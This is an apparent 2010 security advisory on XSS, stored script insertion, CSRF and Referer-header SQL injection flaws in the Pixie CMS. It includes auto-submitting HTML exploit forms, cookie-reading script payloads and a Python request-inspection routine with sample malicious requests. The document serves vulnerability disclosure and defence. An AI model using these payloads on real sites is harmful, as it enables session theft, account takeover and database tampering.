High-Tech Bridge advisory HTB22468

Multiple Vulnerabilities in Pixie

2010-07-01 00:00:00
High-Tech Bridge
www.htbridge.com

EPSS: 0.007
Percentile: 79.7%

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Pixie, which could be exploited to perform cross-site scripting, script insertion and cross-site request forgery attacks.

  1. Cross-site scripting (XSS) vulnerability in Pixie
    The vulnerability exists due to an input sanitization error in the "keywords" parameter in admin/index.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website. Successful exploitation requires that the victim is logged in to the application and has access to the administrative interface.
    Exploitation example:
    <form accept-charset="UTF-8" action="http://host/admin/index.php?s=settings&amp;x=site" method="post" name="main" >
    <input type="hidden" name="sitename" value="Pixie" />
    <input type="hidden" name="url" value="http://host/" />
    <input type="hidden" name="default" value="blog/" />
    <input type="hidden" name="keywords" value='key1"><script>alert(document.cookie)</script>' />
    <input type="hidden" name="site_auth" value="sute author" />
    <input type="hidden" name="site_cright" value="copyright" />
    <input type="hidden" name="cleanurls" value="yes" />
    <input type="submit" name="settings_edit" id="form_addedit_submit" value="Update" />
    </form>
    <script>
    document.getElementById('form_addedit_submit').click();
    </script>

  2. Script insertion vulnerability in Pixie
    Input passed to the "sysmess" parameter in admin/index.php is not properly sanitized. A remote attacker can insert arbitrary HTML and script code, which will be executed in the user's browser in the context of the vulnerable website when the user views the malicious data. Successful exploitation requires that the victim is logged in to the application and has access to the administrative interface.
    Exploitation example:
    <form accept-charset="UTF-8" action="http://host/admin/index.php?s=settings&amp;x=pixie" method="post" name="main" >
    <input type="hidden" name="langu" value="en-gb" />
    <input type="hidden" name="time_zone" value="+0" />
    <input type="hidden" name="dstime" value="no" />
    <input type="hidden" name="dateformat" value="%Oe %B %Y, %H:%M" />
    <input type="hidden" name="rte" value="1" />
    <input type="hidden" name="logs" value="5" />
    <input type="hidden" name="sysmess" value='hello message"><script>alert(document.cookie)</script>' />
    <input type="submit" name="settings_edit" id="form_addedit_submit" value="Update" />
    </form>
    <script>
    document.getElementById('form_addedit_submit').click();
    </script>

  3. Cross-site request forgery (CSRF) in Pixie
    The vulnerability exists due to insufficient validation of the request origin in admin/index.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link, and change the credentials and privileges of arbitrary users.
    Exploitation examples:
    <form accept-charset="UTF-8" action="http://host/admin/index.php?s=settings&amp;x=users" method="post" name="main" >
    <input type="hidden" name="uname" value="myusername" />
    <input type="hidden" name="realname" value="My Real Name" />
    <input type="text" name="email" value="[email protected]" />
    <input type="hidden" name="user_new" value="Save" />
    <input type="hidden" name="privilege" value="2" />
    </form>
    <script>
    document.main.submit();
    </script>
    <form accept-charset="UTF-8" action="http://host/admin/index.php?s=settings&amp;x=users" method="post" name="main" >
    <input type="hidden" name="uname" value="test" />
    <input type="hidden" name="realname" value="test name2" />
    <input type="hidden" name="email" value="[email protected]" />
    <input type="submit" name="user_edit" id="sbmtit" value="Update" />
    <input type="hidden" name="privilege" value="2" />
    <input type="hidden" name="user_id" value="2" />
    </form>
    <script>
    document.getElementById('sbmtit').click();
    </script>

  4. SQL injection vulnerability in Pixie
    The vulnerability exists due to an input sanitization error in the HTTP Referer header in index.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in the application's database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
    Exploitation example:
    GET / HTTP/1.1
    Referer: http://123'SQL_CODE_HERE

This vulnerability was independently discovered by Justin C. Klein Keane in version 1.01 and was assigned CVE-2009-1066.
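As an added defender-side example (not part of the advisory and not Pixie's own code), the following Python routine inspects one parsed HTTP request and flags the four request patterns described above: markup in the "keywords" or "sysmess" settings fields, a state-changing POST to admin/index.php from another origin, and a Referer header carrying SQL metacharacters on index.php. The site hostname, the request dict layout and the sample requests are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit

SITE_HOST = "host"                      # assumed hostname of the Pixie install
ADMIN_PATH = "/admin/index.php"
WATCHED_FIELDS = {"keywords", "sysmess"}  # settings fields named in items 1 and 2
# HTML tags, javascript: URLs or inline event handlers in a form value
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]|javascript:|\bon\w+\s*=", re.I)
# quote/comment characters or SQL keywords in a header that reaches a query
SQL_META_RE = re.compile(r"['\"`;]|--|/\*|\bunion\b|\bselect\b", re.I)


def _host(url):
    """Hostname part of a URL, or None when the URL is absent."""
    return urlsplit(url).hostname if url else None


def inspect_request(req):
    """Return the labels of every advisory pattern matched by one request.

    req is a dict with keys: method, path, headers (dict), form (dict).
    """
    findings = []
    headers = {k.lower(): v for k, v in req.get("headers", {}).items()}
    form = req.get("form", {})
    referer = headers.get("referer", "")

    # Item 4: Referer header with SQL metacharacters on the front page script
    if req["path"] in ("/", "/index.php") and SQL_META_RE.search(referer):
        findings.append("sqli-referer")

    if req["path"] == ADMIN_PATH and req["method"] == "POST":
        # Items 1 and 2: script or HTML markup submitted in the watched fields
        for field in sorted(WATCHED_FIELDS & form.keys()):
            if MARKUP_RE.search(form[field]):
                findings.append(f"markup-in-{field}")
        # Item 3: admin POST whose Origin (or, failing that, Referer) is not
        # the site itself; a request carrying neither header is also flagged
        origin = _host(headers.get("origin")) or _host(referer)
        if origin != SITE_HOST:
            findings.append("cross-origin-admin-post")
    return findings


# Constructed sample requests modelled on the advisory's exploitation examples
FORGED_SETTINGS_POST = {
    "method": "POST", "path": ADMIN_PATH,
    "headers": {"Referer": "http://evil.example/"},
    "form": {"keywords": 'key1"><script>alert(document.cookie)</script>'},
}
REFERER_PROBE = {"method": "GET", "path": "/",
                 "headers": {"Referer": "http://123'SQL_CODE_HERE"}, "form": {}}
```

Requests that carry a Referer but no Origin header are judged by the Referer host, so a browser that strips the Referer on a legitimate same-site submit will be reported as cross-origin; tune that branch to your deployment before alerting on it.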
